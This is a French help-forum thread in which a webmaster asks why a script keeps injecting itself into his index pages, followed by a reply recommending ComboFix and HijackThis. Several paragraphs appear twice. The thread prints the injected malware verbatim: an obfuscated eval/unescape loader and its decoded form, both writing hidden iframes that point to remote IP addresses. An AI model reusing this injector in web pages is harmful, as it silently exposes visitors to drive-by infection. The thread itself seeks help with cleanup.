Par défaut code malicieux qui s'insére dans
nickg
-
nickg -
nickg -
Bonjour,
Depuis plusieurs mois je suis en guerre avec un virus dans mes pages web.
Regulièrement j'ai un script qui s'insére dans mes pages et qui bloque l'affichage des pages en questions.
Il revient tous les 8 jours environ et s'insére uniquement dans les pages nommées "default" ou "index" quelque soit l'extension : html, htm, asp
Au fur et à mesure le script grossit, il fait disparaitre mon code html. Si bien , lorsque qu'on appelle la page en question, c'est une page blanche qui s'affiche.
Régulièrement toutes les semaines je vérifie et je nettoie ce script
Voici le script en question :
<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2
C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2
C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C11
0%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2
C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%
2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script <
Suite à un conseil, j'ai remplacé "eval" "par alert" pour décodé ce foutu code. A l'affichage de la page, une fenêtre s'ouvre avec :
if(!myia){ var i=
0;while((el=document.getElementsByTagName('iframe')).length){if(
(el[i].style.display=='none'|| el[i].style.visibility=='hidden'|| (el[i].width<5&&
el[i].height<5))&& el[i].name!=c1) {el[i].parentNode.removeChild(el[i]);}i++;}
d.write('<IFRAME name=c1
src=\'http://0XD1.%30XA0.0X48.%30XA7?'+Math.round(Math.random()*8877)+'87db\'width=33height=269 style=\'display:none\'></Iframe>');
}var myia=true;
Bien sur l'adresse correspondant un rien. J'ai rien trouvé comme solution avec l'ami google si ce n'est ça :
http://lists.virus.org/bugtraq-0304/msg00257.html (en anglais c'est pas mon truc)
https://www.hugedomains.com/domain_profile.cfm?d=geckozone&e=org (ca me dit pas grand chose
Mes question :
Comment un script peut s'incrire dans une page web sans que le webmaster ou les personnes qui gére le serveur soient au courant.?
comment faire pour éradiquer ce foutu virus ( ou autre chose) ?
Merci pour votre aide
Depuis plusieurs mois je suis en guerre avec un virus dans mes pages web.
Regulièrement j'ai un script qui s'insére dans mes pages et qui bloque l'affichage des pages en questions.
Il revient tous les 8 jours environ et s'insére uniquement dans les pages nommées "default" ou "index" quelque soit l'extension : html, htm, asp
Au fur et à mesure le script grossit, il fait disparaitre mon code html. Si bien , lorsque qu'on appelle la page en question, c'est une page blanche qui s'affiche.
Régulièrement toutes les semaines je vérifie et je nettoie ce script
Voici le script en question :
<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2
C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2
C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C11
0%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2
C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%
2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script <
Suite à un conseil, j'ai remplacé "eval" "par alert" pour décodé ce foutu code. A l'affichage de la page, une fenêtre s'ouvre avec :
if(!myia){ var i=
0;while((el=document.getElementsByTagName('iframe')).length){if(
(el[i].style.display=='none'|| el[i].style.visibility=='hidden'|| (el[i].width<5&&
el[i].height<5))&& el[i].name!=c1) {el[i].parentNode.removeChild(el[i]);}i++;}
d.write('<IFRAME name=c1
src=\'http://0XD1.%30XA0.0X48.%30XA7?'+Math.round(Math.random()*8877)+'87db\'width=33height=269 style=\'display:none\'></Iframe>');
}var myia=true;
Bien sur l'adresse correspondant un rien. J'ai rien trouvé comme solution avec l'ami google si ce n'est ça :
http://lists.virus.org/bugtraq-0304/msg00257.html (en anglais c'est pas mon truc)
https://www.hugedomains.com/domain_profile.cfm?d=geckozone&e=org (ca me dit pas grand chose
Mes question :
Comment un script peut s'incrire dans une page web sans que le webmaster ou les personnes qui gére le serveur soient au courant.?
comment faire pour éradiquer ce foutu virus ( ou autre chose) ?
Merci pour votre aide
A voir également:
- Par défaut code malicieux qui s'insére dans
- Code ascii - Guide
- Insérer une vidéo dans powerpoint - Guide
- Code puk bloqué - Guide
- Comment déverrouiller un téléphone quand on a oublié le code - Guide
- Code activation windows 10 - Guide
2 réponses
slt
Télécharge Combofix de sUBs : Renomme le avant toute installation, par exemple, nomme le "KillBagle". aide ici : https://forum.pcastuces.com/sujet.asp?f=25&s=37315
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
Sauvegarde le sur ton bureau et pas ailleurs !
Aide à l’utilisation de combofix ici: https://bibou0007.forumpro.fr/login?redirect=%2Ft121-topic
Double-clic sur combofix, Il va te poser une question, réponds par la touche 1 et entrée pour valider, laisse toi guider.
Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.
______________
colle un rapport hijackthis
http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download
manuel :
https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html
Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.
ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste
Ensuite avec Explorer créer un dossier c:\hijackthis
Décompresser Hijackthis dans ce dossier.
C'est important pour les sauvegardes."
Télécharge Combofix de sUBs : Renomme le avant toute installation, par exemple, nomme le "KillBagle". aide ici : https://forum.pcastuces.com/sujet.asp?f=25&s=37315
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
Sauvegarde le sur ton bureau et pas ailleurs !
Aide à l’utilisation de combofix ici: https://bibou0007.forumpro.fr/login?redirect=%2Ft121-topic
Double-clic sur combofix, Il va te poser une question, réponds par la touche 1 et entrée pour valider, laisse toi guider.
Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.
______________
colle un rapport hijackthis
http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download
manuel :
https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html
Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.
ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste
Ensuite avec Explorer créer un dossier c:\hijackthis
Décompresser Hijackthis dans ce dossier.
C'est important pour les sauvegardes."
